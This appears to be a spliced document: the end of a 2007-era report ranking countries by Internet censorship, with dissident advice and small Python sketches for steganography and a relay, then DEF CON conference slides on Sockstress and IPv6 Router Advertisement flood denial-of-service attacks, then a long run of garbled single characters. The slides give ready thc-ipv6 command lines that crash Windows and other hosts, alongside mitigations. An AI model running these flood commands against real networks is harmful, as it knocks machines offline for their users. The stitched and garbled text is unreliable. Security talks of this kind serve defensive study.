telephone numbers. One month later, when an opposition “flash-mob” was organized over
Internet, attendees were promptly arrested by waiting policemen.
The history of political cyber warfare in Belarus demonstrates that Internet filtering and
government surveillance there may not always be comprehensive, but can be highly focused
on specific adversaries and at critical points in time.
# 05 Burma
Out of a population of almost 50 million, the number of Internet hosts in Burma is currently
reported at 42, and the number of Internet users is 78,000 (about 0.16%). For the citizen who is
lucky enough to obtain Internet access, he or she travels not on the World Wide Web but instead
to the “Myanmar Internet”, which is composed only of a small number of officially sanctioned
business websites. The two ISPs are the state Ministry of Post and Telecommunications (MPT),
and a semi-private firm called Bagan Cybertech (BC). Foreign companies and embassies are
allowed to have their own connections. A few cyber cafés exist, but because they require name,
identification number, address, and frequent screenshots of user activity, online anonymity is
virtually unattainable. Webmail, politics (i.e. Aung San Suu Kyi), anonymizers and pornography
are all blocked. Only state-sponsored e-mail accounts are allowed.
According to the 1996 Computer Science Development Law, all network-ready computers must
be registered with MPT. Failure to register a computer and/or sharing an Internet connection can
earn Burmese citizens up to 15 years in prison. Burma’s State Peace and Development Council
(SPDC) prohibits “any criticism of a non-constructive type”, “writings related to politics”,
“anything detrimental to the ideology of the state”, and “writings directly or indirectly
detrimental to the current policies and secret security affairs of the government”. Indeed,
according to Burmese law, it is fundamentally illegal to have “incorrect ideas”.
Even after all that, surveys suggest that cost is still the worst part of Internet access. In Burma,
the average annual income is $225. A broadband connection costs $1,300. The most common
form of Internet access – dial-up – costs $6 for about 10 hours. Outside Rangoon and Mandalay,
long distance fees are required. Entrance to a cyber café is $1.50.
There is very little resistance to Burma's Internet governance. On the international front, Web-
based activist groups such as the Free Burma Coalition and BurmaNet have been organizing on-
line since 1996. The data filtering company that sold its software to Burma was not keen on
public knowledge of the sale. It was reported that after the company denied any knowledge of it,
a privacy group found a picture on the Web of the Burmese Prime Minister and the company's
Sales Director, closing the deal.
# 04 Cuba
Cuba boasts a highly educated population, but unfortunately less than 2% of its citizens are
currently able to connect to the Internet. Without special authorization, private citizens are
prohibited from buying computers or accessing the Internet. The Government owns nearly all
computers on the island. Even telephone line density is less than 10 per 100 inhabitants, and
wireless access remains restricted to foreigners and regime elites.
Cuban Decree-Law 209, written in June, 1996, states that “access from the Republic of Cuba to
the Global Computer Network” will not violate “moral principles” or “jeopardise national
security”. Illegal connections to the Web can earn a prison sentence of 5 years; posting a
counter-revolutionary article, 20 years. At least two dozen journalists are now serving up to 27
years in prison. It is reported that, as in several other countries in the Exodus Top Ten, Internet
filtering and surveillance equipment were bought from China.
A human rights activist, while in Cuba, sent a test email message that contained the names of
multiple Cuban dissidents. A pop-up window announced: “This programme will close down in a
few seconds for state security reasons”, and then her computer crashed. Further, the
government’s Internet monitoring program appears to be able to target specific audiences. At the
Non-Aligned Movement summit in Havana (Sept 2006), conference attendees reported having no
problem accessing a wide variety of websites.
There are reportedly a “few” Correos de Cuba, or state-run Internet cafés. The cost for 1 hour of
access is $4.50, or about ½ the average monthly wage of $10. Use of a state-run email account is
$1.50 per hour. As a cheaper method of access, Cubans have borrowed Internet connections from
expatriates, some of whom have been summoned by the Cuban police and subsequently
threatened with expulsion from the country.
In Cuba, Internet connection codes obtained from the government are used to access the Internet
at certain times of the day. These codes are now bought and sold on a healthy cyber black
market. For Cubans desperate for information from the outside world, these codes can fetch
extraordinary sums for the impoverished country, up to a dollar a day. It was reported that
students have been expelled from school for selling their codes to others, as well as for creating
illicit chat forums. Following the incident, there was a video posted to the Web that showed
university officials announcing their punishment to a school auditorium. Since buying computer
equipment in Cuba without government authorization is illegal, there is also a black market for
computer parts, and prices are said to be “extremely” high.
# 03 China
The People’s Republic of China (PRC) possesses the world's most sophisticated Internet
surveillance system. It is variously described as ubiquitous, mature, dynamic, precise, and
effective. Beijing employs an army of public and private cyber security personnel, has a massive
legal support system behind it, and can rely on numerous layers of policy and technical control
mechanisms in order to keep a close eye on its population. However, due to a relatively freer
economic system than some other countries in this list, the Middle Kingdom only registers on the
Exodus Cyber Top Ten at #3.
While comprehensive laws support government control of traditional media and the Internet,
individual privacy statutes are unclear, in short supply, and perhaps even inapplicable in terms of
the information space. However, it must be said that in Asia, it is generally accepted that there is
less privacy in one’s daily life, and the general populace is more comfortable with government
oversight than in the West.
The PRC not only has strict controls on access to the World Wide Web, but there are policemen
stationed at cyber cafés, and there is a Chinese “Great Firewall” designed specifically to prevent
the free flow of information into and out of the country, including, for example, the passing of
videos of Chinese prison and factory conditions to human rights groups abroad. By way of
example, cyber cafés are one of the primary ways that Chinese citizens access the Internet; the
cafés are required to track their patrons’ usage for 60 days.
The “Great Firewall” of China has been credited with providing the country with highly
sophisticated censorship. Among the types of information known to be blocked are politics,
religion, and pornography. Activist testing revealed that search results came up short on Taiwan,
Tibet, Falun Gong, Dalai Lama, and Tiananmen Square. In the past, Google and the BBC have
both been blocked wholesale. Interestingly, sites that are often accessible are major American
media sites, human rights groups’ pages, and anonymizers. It is believed that search results are
blocked by keyword at the national gateway, and not by Chinese search engines themselves.
Western companies, for their part, have been accused of too much cooperation with the
government in Beijing on cyber control issues. Google, Yahoo, and Microsoft have all
collaborated with the Communist government in prosecutions. At least one U.S. congressman
has termed such cooperation “sickening and evil”, and compared it to the work IBM did for the
Nazi government during World War II.
China is now on the cutting edge of world research and development on Internet technologies.
Exodus worries, however, that Beijing’s emphasis on many of these technologies – including
IPv6 – is primarily a strategy for population control. PRC Internet Society chairwoman Hu
Qiheng has stated flatly that China’s goal is for the Chinese Internet to achieve a state of “no
anonymity”.
The level of sophistication in Chinese Internet surveillance can be seen by the fact that some
URLs were reportedly blocked even while their corresponding top level domains (TLD) were
accessible, even when webpage content appeared consistent across the domain. In other words,
the system is likely not being run solely by machines, but by human personnel as well. Further, it
was reported that blog entries have not only been denied, but some of them may even have been
edited, and reposted to the Web!
In March, 2007, China announced that its Great Firewall had been insufficient to keep out the
Mongol invaders from cyberspace. President Hu Jintao called for a “purification” of the Internet,
and indicated that Beijing would seek to tighten its control over computer networks. According
to Hu, new technologies such as blogging and webcasting have allowed Chinese citizens to
escape government censorship. Among the things said to suffer from this evasion are the
“development of socialist culture”, the “security of information”, and the “stability of the state”.
Among the forthcoming initiatives was an announcement that no new cyber cafés would open in
China this year.
# 02 Turkmenistan
President-for-Life Saparmurat Niyazov – the Turkmenbashi, or the Father of All – recently and
unexpectedly passed away. While the country is now in a hopeful state of transition, the
personality cult that Niyazov left behind has Turkmen citizens in a deep hole from which it may
be difficult to escape. There is no independent press, and until recently everything written for
television, newspaper, and radio was some type of hymn or tribute to Niyazov.
Telecommunications in Turkmenistan remains woefully underdeveloped. The Turkmentelekom
monopoly has allowed almost no Internet access into the country whatsoever. No connections
from home, and no cyber cafés. Foreign embassies and non-governmental organizations have
their own access to the Internet. While they have in the past offered access to ordinary Turkmen,
to take advantage of that offer was too dangerous for the average citizen. There exist only a
handful of approved websites, belonging to a few Turkmen organizations. In 2001, a count of IT-qualified
certifications in the former Soviet Union placed Turkmenistan dead last, with only fifty-eight in
total.
In 2005, the CIA reported that there were only 36,000 Internet users, out of a population of 5 million.
In 2006, a Turkmen journalist who had dared to work with Radio Free Europe died quickly in
prison, only three months after being jailed. Despite repeated European Union (EU) demands,
there has been no investigation into the incident.
Following the demise of the Turkmenbashi, elections were held in February, 2007. Gurbanguli
Berdymukhamedov won a tightly controlled vote, unmonitored by international observers. One
of his campaign promises was that there would be unrestricted access to the Internet.
Days after the new leader was sworn in, 2 cyber cafés opened in Ashgabat. Each is equipped
with 5 computers, 5 desks, and 5 chairs. One is in the Soviet-style Central Telegraph building,
the other in a run-down telephone exchange. The café administrator, Jenet Khudaikulieva, told a
visiting AP journalist at the Grand Opening that censorship in Turkmenistan was over. The
journalist had no problem viewing international news sites, including those belonging to
Turkmen political opposition groups. He reported no registration counter and no “visible”
oversight. However, the price per hour, $4, is a lot to pay in a country where the average
monthly income is less than $100. Indeed, almost no one attended the Grand Opening ceremony.
Life will hopefully take a turn for the better in Turkmenistan. On the bright side, reports suggest
that even though connections to the Internet have been few and far between, computer gaming
appears quite popular. Lastly, the use of satellite TV is on the rise, which could also be used to
improve Internet connectivity.
# 01 North Korea
The closest thing on Earth to George Orwell’s 1984 is the Democratic People’s Republic of
Korea (DPRK). NASA currently has better connectivity with Mars than the rest of planet Earth
has with North Korea, the world's most isolated and repressed country.
Citizens are taught, however, that North Korea is superior to all other countries; therefore, the
perceived threat to the nation-state from unrestricted access to the Internet is extraordinarily high.
Traditional media, including both television and radio, consist of state channels only.
Reminiscent of the life of Winston Smith, the DPRK has a “national intercom” cable/radio station
wired throughout the country. It is a significant source of information for the average North
Korean citizen, offering both news and commentary, and like the two-way telescreens of 1984 is
wired into residences and workplaces throughout the country.
Computers are unavailable in the DPRK. Even if they were, the price would certainly be out of
reach in a country where wild animals – and even tree bark – are scarce because the citizens are so
poor and hungry.
Still, Kim Jong-il, Dear Leader of the DPRK, is reported to be fascinated with the IT revolution.
In 2000, he gave the visiting U.S. Secretary of State Madeleine Albright his personal email
address. Still, it is currently thought that only a small circle of North Korean leadership would
have unfiltered Internet access.
North Korea does have an IT school. Every year, one hundred male students, who matriculate as
young as 8 years old, are chosen to attend the Kumsong computer school, where they study
computer programming and English. They are not permitted to play games, or to access the
Internet, but they are allowed to Instant Message each other within the school. A visiting
Western journalist reported the use of Taiwanese hardware and Microsoft software.
According to the South Korean Chief of Military Intelligence, top graduates from the Kim Il-
Sung Military Academy have been chosen for an elite, state-sponsored hacker unit. Allegedly,
they have been instructed to develop “cyber-terror” military options on direct orders from Kim
Jong-Il. Broadly speaking, DPRK intelligence collection is said to be fairly sophisticated, with a
clear collection focus on South Korea, the U.S., and Japan.
Internet connections from North Korea back to Earth are channeled via Moscow and Beijing
through the Korea Computer Centre (KCC), established in 1990. The KCC provides the
government in Pyongyang with its international pipe, and serves as its IT hub. Reports suggest
that it downloads an officially approved, limited amount of research and development
information, and pushes it to a very short list of clients.
The government’s official stance on Internet connectivity is that it cannot tolerate an influx of
“spiritual pollution” into the country. However, the DPRK has been caught operating a state-run
“cyber casino” on a South Korean IP address. Since that discovery, South Korean companies
have been under orders not to register North Korean sites without government approval.
Notes from the Underground
Cyber Control
Technology moves far faster than any government bureaucracy. The Internet changes every
second. We post our messages on dozens of new websites every day, and push the addresses out
before the government can block them. By the time they censor us, we are no longer there.
While Big Brother may prevent some basic cyber attacks, they never even see the clever ones.
Underground sources are now providing us with computer software that will bring this
government to its knees.
The Internet, just like a living organism, needs air to breathe. It thrives based only on the
open exchange of information. The most likely thing about the future is that it will be ever
more wired. Our challenge is to turn better communication into more power for the common
man. Human rights battles will continue to be waged in the future, but time is on our side.
If the government continues to strangle the development of the Internet in our country, the
end result will be death to the economy, and then death to the state. Either way, we win.
Cyber Resistance
The Internet has done more for the cause of freedom than any technology in history, for both
activists and for ordinary citizens. Traditional media pale in comparison, as the printing
press and radio are much more susceptible to government control.
However, we still have much to fear. The reports from Minsk are not encouraging. There are
no magic bullets, only hard work ahead. Even under our new government, the rights of the
people to live in privacy and peace will have to be balanced with legitimate law
enforcement powers. As an immediate goal, negotiations should push for transparency. The
government must explain everything it is doing, and why.
Retain a high degree of skepticism regarding everything you see on the Internet. Increase
vigilance at key times such as elections. Truth is hard enough to find in the real world. In
cyberspace, it is ten times harder. Cyber proof may require that you already know the
answer to the question you are asking, or that you verify what you find from a second source.
A freedom fighter, a terrorist, and a government agent walk into an Internet chat room.
Which of them emerges alive? The only way to know for sure is to arrange a meeting in real
life!
Resistance Tools
If I tried to offer you one specific cyber solution, the government would subvert it and use it
against us. Revolutionary corps cadres are studying dozens of strategies to provide us with
both information and anonymity. Here are some of the basic tools:
~ Direct access to foreign ISPs
~ Telephone, Web, Satellite
~ Anonymous email correspondence
~ Remailers, RSS Mailer
~ Anonymous Web browsing
~ P2P, Proxy servers, Encryption
~ Dead drops in cyberspace
~ Saving information at a prearranged location
~ Steganography
~ Hiding truth among the lies
~ Covert channels
~ Normal activity at unusual times
~ Common hacker tools
~ Cyber magic in a box
~ Out of the box thinking
~ Saving text as pictures
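One of the techniques above, steganography, can be sketched in a few lines: hide each bit of a message in the least-significant bits of an innocuous byte stream, where casual inspection sees only the cover data. This is a toy illustration of the principle, not a fielded tool:

```python
def hide(cover: bytes, secret: bytes) -> bytes:
    """Store each bit of `secret` in the low bit of one cover byte."""
    bits = [(byte >> i) & 1 for byte in secret for i in range(8)]
    assert len(cover) >= len(bits), "cover too small"
    out = bytearray(cover)
    for pos, bit in enumerate(bits):
        out[pos] = (out[pos] & 0xFE) | bit  # overwrite only the low bit
    return bytes(out)

def reveal(stego: bytes, length: int) -> bytes:
    """Recover `length` secret bytes from the low bits."""
    secret = bytearray()
    for i in range(length):
        byte = 0
        for j in range(8):
            byte |= (stego[i * 8 + j] & 1) << j
        secret.append(byte)
    return bytes(secret)
```

Applied to an image file's pixel data, this is the "saving text as pictures" idea: the carrier looks unchanged, and only someone who knows where to look extracts the message.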
New tools are frequently released. A recent program called Psiphon is specifically designed for
information gathering in countries like ours. It is easy to use, and should be difficult for
governments to discover. Here is how it works: a computer user in a free country installs
Psiphon on his computer, then passes connection information, including a username and
password, to a comrade in a country like ours, usually by telephone or posted mail. The
censored user can then open an encrypted connection through the first user’s computer to the
Internet. This type of communication is difficult for the government both to target and to
decipher.
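The mechanism described above, an authenticated forwarding connection through a trusted peer's machine, can be illustrated with a toy relay. This is a hypothetical sketch of the concept only, not Psiphon's actual protocol or code: the one-line credential check and plain-TCP forwarding stand in for its real encrypted channel.

```python
import socket
import threading

SECRET = b"user:password\n"  # stand-in for the shared credentials

def relay(listen_port: int, dest_host: str, dest_port: int) -> None:
    """Accept one client, check its credential line, then forward one
    request to the destination and one reply back to the client."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(1)
    client, _ = srv.accept()
    cred = client.recv(len(SECRET))
    if cred != SECRET:
        client.close()            # wrong password: drop the connection
        srv.close()
        return
    upstream = socket.create_connection((dest_host, dest_port))
    upstream.sendall(client.recv(4096))   # forward the request
    client.sendall(upstream.recv(4096))   # forward the reply
    upstream.close(); client.close(); srv.close()
```

The censored user only ever talks to the comrade's machine; the government sees one connection to an unremarkable address rather than a connection to the blocked site itself.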
No single strategy or tool will provide us a perfect solution, because the Internet will never
behave exactly as anyone, including the government, would like. One final warning: if you
feel that you are personally being targeted by Big Brother, lay low. You may already be in a
position where very little can help you.
The Future
Our understanding of world affairs and human rights is growing dramatically, especially in the
Internet era. In the future, hopefully it will be impossible to enslave or even to fool millions of
people. The Internet may be our ticket out of here, so we must try to master it.
Big Brother has many advantages over the people, in brute force and in technology. His tools are
everywhere, and they are more precise than ours. Still, the government is also constrained by the
limits of technology, which are considerable.
Always be suspicious of Internet outages. Try to understand whether the government is targeting
the population as a whole, or you personally. Is the information you seek known to the
government? Are there key words that spies could find? You will have to answer the most
important question for yourself: does the information you seek not exist, or was the government
keeping it from you?
EG
Informants
"2002 Global IT IQ Report", Brainbench, March 2002, www.brainbench.com/pdf/globalitiq.pdf
"Amnesty International concerned at increasing censorship in Iran", Payvand, 12/7/06,
http://www.payvand.com/news/06/dec/1067.html
Anonymous, "Cuba inches into the Internet Age", The Los Angeles Times, November 19, 2006,
http://www.latimes.com/technology/la-fg-cubanet19nov19,1,2828501.story?coll=la-headlines-technology
Beer, Stan. "Iran an enemy of YouTube", Wednesday, 06 December 2006, ITWire,
http://www.itwire.com.au/content/view/7795/53/
"Belarus KGB arrests U.S. Internet specialist", Reuters, October 19, 2004, http://news.zdnet.com/2100-3513_22-
5417399.html
Boghrati, Niusha. "Information Crackdown", Worldpress.org, October 26, 2006,
http://www.worldpress.org/Mideast/2536.cfm
"China keeps largest number of scribes in jail", Associated Press, 12/10/2006,
http://www.thepeninsulaqatar.com/Display_news.asp?section=World_News&subsection=Rest+of+the+World&month=
December2006&file=World_News20061210151736.xml
"A crack in the isolation of Turkmenistan: Internet cafes", USA Today (AP), 2/16/2007,
http://www.usatoday.com/news/world/2007-02-16-turkmenistan_x.htm
"DansGuardian: true web content filtering for all", http://dansguardian.org
Edelman, Ben. "On a Filtered Internet, Things Are Not As They Seem", Reporters Without Borders,
http://www.rsf.org/article.php3?id_article=10761
EURSOC Two. "Iran Running Scared Of The Net", 04 December, 2006,
http://eursoc.com/news/fullstory.php/aid/1260/Iran_Running_Scared_Of_The_Net.html
Fifield, Anna. "N Korea’s computer hackers target South and US", Financial Times, 10/4/2004,
http://www.ft.com/cms/s/3d592eb4-15f0-11d9-b835-00000e2511c8.html
Geers, Kenneth. “Sex, Lies, and Cyberspace: Behind Saudi Arabia's National Firewall”, GSEC Version 1.4, 2003,
http://www.giac.org/certified_professionals/practicals/gsec/2259.php
“The Internet and Elections: The 2006 Presidential Election in Belarus (and its implications)”, OpenNet Initiative:
Internet Watch, April 2006
"Internet Filtering in Burma in 2005: A Country Study", OpenNet Initiative, October 2005,
http://www.opennetinitiative.net/burma
“Internet Filtering in China 2004-2005: A Country Study”, The OpenNet Initiative, April 14, 2005
"Internet Filtering in Iran in 2004-2005", OpenNet Initiative, www.opennetinitiative.net/iran
"Internet fuels rise in number of jailed journalists", Committee to Protect Journalists, Special Report 2006,
http://www.cpj.org/Briefings/2006/imprisoned_06/imprisoned_06.html
"Internet-based SMS blocked for Iran's elections", IranMania, December 04, 2006,
http://www.iranmania.com/News/ArticleView/Default.asp?NewsCode=47753&NewsKind=Current%20Affairs
"Iran blocks YouTube, Wikipedia and NYT", The Bangkok Post, Dec 6, 2006,
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=114803
Karmanau, Yuras. "U.S. citizen arrested by Belarusian KGB", Associated Press, October 19, 2004,
http://www.signonsandiego.com/news/world/20041019-0455-belarus-us-arrest.html
Kennicott, Philip. "With Simple Tools, Activists in Belarus Build a Movement", Washington Post, September 23, 2005,
http://www.washingtonpost.com/wp-dyn/content/article/2005/09/22/AR2005092202012_pf.html
Last, Alex. "Eritrea goes slowly online", BBC News, 14 November, 2000,
http://news.bbc.co.uk/2/hi/africa/1023445.stm
Lobe, Jim. "RIGHTS GROUPS CONDEMN IRAN’S INTERNET CRACKDOWN", Eurasianet, 11/16/04,
http://www.eurasianet.org/departments/civilsociety/articles/eav111604.shtml
LonghornFreeper. "North Korean military hackers unleash "cyber-terror" on South Korean computers", Free Republic,
05/27/2004, http://www.freerepublic.com/focus/f-news/1143440/posts
Magee, Zoe. "Iran's Internet Crackdown", ABC News, Dec. 6, 2006,
http://abcnews.go.com/International/print?id=2704399
Manyukwe, Clemence. "Zimbabwe: Paranoia Grips Govt", OPINION, Zimbabwe Independent (Harare), November 10,
2006 http://allafrica.com/stories/200611100389.html
"Media warfare in the Horn of Africa", BBC Online Network, March 2, 1999,
http://news.bbc.co.uk/2/hi/world/monitoring/280680.stm
Mite, Valentinas. "Belarus: Opposition Politicians Embrace Internet, Despite Digital Divide", Radio Free Europe/Radio
Liberty (Bymedia.net), February 7, 2006, http://www.rferl.org/featuresarticle/2006/2/94d60147-0a69-4f28-86c3-
728a651fb0d0.html?napage=2
"Mugabe's spies to infiltrate internet cafés", AFRICAST: Global Africa Network, SOUTHERN REGION NEWS, 12/04/06
http://news.africast.com/africastv/article.php?newsID=60327
"New Belarus Bill Restricts Online Dating", ABC News,
http://abcnews.go.com/Technology/wireStory?id=1412972&CMP=OTC-RSSFeeds0312
New Software to Fight Web Censorship, The Irawaddy, Friday, December 01, 2006,
http://www.irrawaddy.org/aviewer.asp?a=6443&z=148
Nichols, Michelle. "Jailed journalists worldwide hits record", New Zealand Herald, December 8, 2006,
http://www.nzherald.co.nz/section/story.cfm?c_id=2&ObjectID=10414439
"North Korea nurturing nerds", The Sydney Morning Herald, 10/21/2005,
http://www.smh.com.au/articles/2005/10/20/1129775892093.html
O'Brien, Danny. "A Code of Conduct for Internet Companies in Authoritarian Regimes", Electronic Frontier Foundation,
February 15, 2006, http://www.eff.org/deeplinks/archives/004410.php
Perkel, Colin. "Canadian software touted as answer to Internet censorship abroad", Canoe, 2006-12-01,
http://money.canoe.ca/News/Sectors/Technology/2006/11/30/2561763-cp.html
Peta, Basildon. "Brainwashing camp awaits Harare journalists", November 29, 2006, Independent Online,
http://www.iol.co.za/index.php?set_id=1&click_id=84&art_id=vn20061129022721568C138622
"Press Freedom Round-up 2006", Reporters Without Borders, 31 December 2006,
http://www.rsf.org/article.php3?id_article=20286
Rena, Ravinder. "Information Technology and Development in Africa: The Case of Eritrea", November 26, 2006,
http://www.worldpress.org/Africa/2578.cfm
Reyes, Nancy. "First they censored the letters, then the internet, and now, cellphones", November 28th, 2006,
http://www.bloggernews.net/12537
Slavin, Barbara. "Internet boom alters political process in Iran", USA TODAY, 6/12/2005,
http://www.usatoday.com/news/world/2005-06-12-iran-election-internet_x.htm
"South Korea probes North Korea's cyber-casino", TechCentral, 1/14/2004, Computer Crime Research Center,
http://www.crime-research.org/news/2004/01/Mess1401.html (original: The Star Online (Malaysia), http://star-
techcentral.com/tech/story.asp?file=/2004/1/14/technology/7106580&sec=technology)
Sprinkle, Timothy. "Press Freedom Group Tests Cuban Internet Surveillance", World Politics Watch, 08 Nov 2006,
http://worldpoliticswatch.com/article.aspx?id=321
Thomas, Luke. "Iran Online: The mullahs can’t keep their people from the world", March 02, 2004,
http://www.nationalreview.com/comment/thomas200403021100.asp
"Turkmenistan", Reporters Without Borders, http://www.rsf.org/article.php3?id_article=10684
Usher, Sebastian. "Belarus protesters turn to internet", BBC, 21 March 2006,
http://news.bbc.co.uk/2/low/europe/4828848.stm
Usher, Sebastian. "Belarus stifles critical media", BBC, 17 March 2006,
http://news.bbc.co.uk/2/low/europe/4818050.stm
Voeux, Claire and Pain, Julien. "Going Online in Cuba - Internet under surveillance", Reporters Without Borders,
October 2006, http://www.rsf.org/article.php3?id_article=19335
Zimbabwe, Amnesty International, http://www.amnesty.ca/zimbabwe/
"Zimbabwe: Revised Bill Still Threatens Rights of Access to Information And Free Expression", Media Institute of
Southern Africa (Windhoek)", PRESS RELEASE, December 1, 2006, http://allafrica.com/stories/200612010376.html
Evil DoS Attacks and Strong Defenses

Sam Bowne and Matthew Prince
DEF CON 21
August 2, 2013

Bio

Evil Attacks
• Sockstress
• New IPv6 RA Flood

Sockstress

TCP Handshake
(Images from drawingstep.com and us.123rf.com)
Client / Server

TCP Window Size
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
TCP Header Format
Sockstress Attack
(Images from drawingstep.com and us.123rf.com)
Client / Server

From 2008
• Still not patched
• Attacks TCP by sending a small WINDOW size
• Causes sessions to hang up, consuming RAM
• Can render servers unbootable

Sockstress Demo
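The small-window trick above can be felt in miniature with ordinary sockets: a receiver that never reads lets its buffers and the sender's fill, leaving the session stalled while kernel state stays pinned. This is a benign, loopback-only sketch of the underlying TCP behavior, not the Sockstress tool itself:

```python
import socket

def stall_demo() -> int:
    """Benign loopback sketch of the condition Sockstress exploits:
    a receiver that never reads, so the sender's non-blocking writes
    stall once the windows fill and the session hangs with kernel
    memory pinned. Returns the bytes sent before the stall."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    sender = socket.create_connection(srv.getsockname())
    receiver, _ = srv.accept()
    sender.setblocking(False)
    sent = 0
    try:
        while True:                 # write until the buffers fill
            sent += sender.send(b"x" * 4096)
    except BlockingIOError:
        pass                        # buffers full: the session is stalled
    for s in (sender, receiver, srv):
        s.close()
    return sent

if __name__ == "__main__":
    print("sender stalled after", stall_demo(), "bytes")
```

Sockstress weaponizes this at scale by advertising tiny or zero windows across thousands of handshakes, so the server holds all of the stalled state.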
Mitigation
• Short-term
  – Block packets with small window sizes with a firewall
• Long-term
  – PATCH OS to reclaim RAM
  – It’s been 5 years, guys!
IPv4 Exhaustion

IPv4 Exhaustion: One Year Left

IPv6 Exhaustion

Link-Local DoS: IPv6 Router Advertisements

Old Attack (from 2011)
(Image from forumlane.org)

IPv4: DHCP PULL process
• Client requests an IP
• Router provides one
  Host: "I need an IP" / Router: "Use this IP"

IPv6: Router Advertisements PUSH process
• Router announces its presence
• Every client on the LAN creates an address and joins the network
  Router: "JOIN MY NETWORK" / Host: "Yes, SIR"
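The PUSH step is what makes the flood possible: each advertised prefix causes every host to derive and configure an address on its own. A minimal sketch of the classic EUI-64 derivation, one common SLAAC scheme (modern hosts often use randomized identifiers instead), assuming the prefix is passed as a colon-terminated string:

```python
def eui64_address(prefix: str, mac: str) -> str:
    """Derive an IPv6 address from a /64 prefix and a MAC address
    using EUI-64: flip the universal/local bit of the MAC and
    insert ff:fe in the middle to form the interface identifier."""
    octets = [int(part, 16) for part in mac.split(":")]
    octets[0] ^= 0x02                       # flip the U/L bit
    iid = octets[:3] + [0xFF, 0xFE] + octets[3:]
    groups = [f"{iid[i] << 8 | iid[i + 1]:x}" for i in range(0, 8, 2)]
    return prefix + ":".join(groups)

# e.g. eui64_address("2001:db8:a:0:", "00:11:22:33:44:55")
#      -> "2001:db8:a:0:211:22ff:fe33:4455"
```

Because the host does all this work unprompted for every prefix it hears, a flood of fake prefixes translates directly into CPU and memory churn on every machine on the LAN.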
Router Advertisement Packet

RA Flood (from 2011)
flood_router6
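An RA is just a small ICMPv6 message (type 134) with options appended, which is why the flood tools can generate them at wire speed with fabricated prefixes. A minimal sketch of the fixed RA header layout from RFC 4861; the checksum is left at zero for illustration, since a real packet needs the ICMPv6 pseudo-header checksum:

```python
import struct

def ra_header(hop_limit: int = 64, router_lifetime: int = 1800) -> bytes:
    """Pack the fixed part of an ICMPv6 Router Advertisement (RFC 4861):
    type=134, code=0, checksum (0 here), cur hop limit, flags,
    router lifetime, reachable time, retrans timer."""
    ICMPV6_RA = 134
    flags = 0x00                    # M/O bits clear
    return struct.pack("!BBHBBHII",
                       ICMPV6_RA, 0, 0,     # type, code, checksum
                       hop_limit, flags,
                       router_lifetime,
                       0, 0)                # reachable time, retrans timer

print(ra_header().hex())
```

Everything dangerous lives in the options that follow this 16-byte header: Prefix Information and Route Information options are what each victim host must process and act on.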
Effects of flood_router6
• Drives Windows to 100% CPU
• Also affects FreeBSD
• No effect on Mac OS X or Ubuntu Linux
The New RA Flood
(Image from guntech.com)

MORE IS BETTER
• Each RA now contains
  – 17 Route Information sections
  – 18 Prefix Information sections

Flood Does Not Work Alone
• Before the flood, you must send some normal RA packets
• This puts Windows into a vulnerable state
  – Thanks to var_x for noticing this in my lab at CCSF
How to Perform this Attack
• For best results, use a gigabit Ethernet NIC on attacker and a gigabit switch
• Use thc-ipv6 2.1 on Linux
• Three Terminal windows:
  1. ./fake_router6 eth1 a::/64
  2. ./fake_router6 eth1 b::/64
  3. ./flood_router26 eth1
• Windows dies within 30 seconds
Effects of New RA Flood
• Win 8 & Server 2012 die (BSOD)
• Microsoft Surface RT dies (BSOD)
• Mac OS X dies
• Win 7 & Server 2008 R2, with the "IPv6 Readiness Update", freeze during attack
• iPad 3 slows and sometimes crashes
• Android phone slows and sometimes crashes
• Ubuntu Linux suffers no harm

Videos and Details
Mitigation
• Disable IPv6
• Turn off Router Discovery with netsh
• Use a firewall to block rogue RAs
• Get a switch with RA Guard
• Microsoft's "IPv6 Readiness Update" provides some protection for Win 7 & Server 2008 R2
  – Released Nov. 13, 2012
  – KB 2750841
  – But NOT for Win 8 or Server 2012!!
DEMO

More Info
• Slides, instructions for the attacks, & more at Samsclass.info
-
,
8
-
5
,
2
,
:
-
.
9
/
,
9
G
.
-
.
`
5
6
-
6
:
0
9
9
.
<
9
0
C
9
,
/
/
5
8
C
-
?
.
.
8
C
5
8
.
/
,
8
,
C
.
/
.
8
-
7
0
/
=
<
3
-
.
9
D
-
E
<
5
7
,
2
2
E
-
0
,
7
?
5
.
@
.
?
5
C
?
.
9
0
3
-
<
3
-
<
0
>
.
9
A
H
?
.
,
:
-
.
9
/
,
9
G
.
-
<
9
0
1
3
7
-
-
,
G
.
6
-
?
.
:
0
9
/
0
:
,
1
.
@
5
7
.
-
0
7
0
8
8
.
7
-
@
5
,
-
?
.
[
H
X
-
?
,
-
<
9
0
C
9
,
/
6
-
?
.
.
8
C
5
8
.
/
,
8
=
,
C
.
/
.
8
-
7
0
/
<
3
-
.
9
D
0
9
,
9
.
<
2
,
7
.
/
.
8
-
/
.
/
0
9
E
7
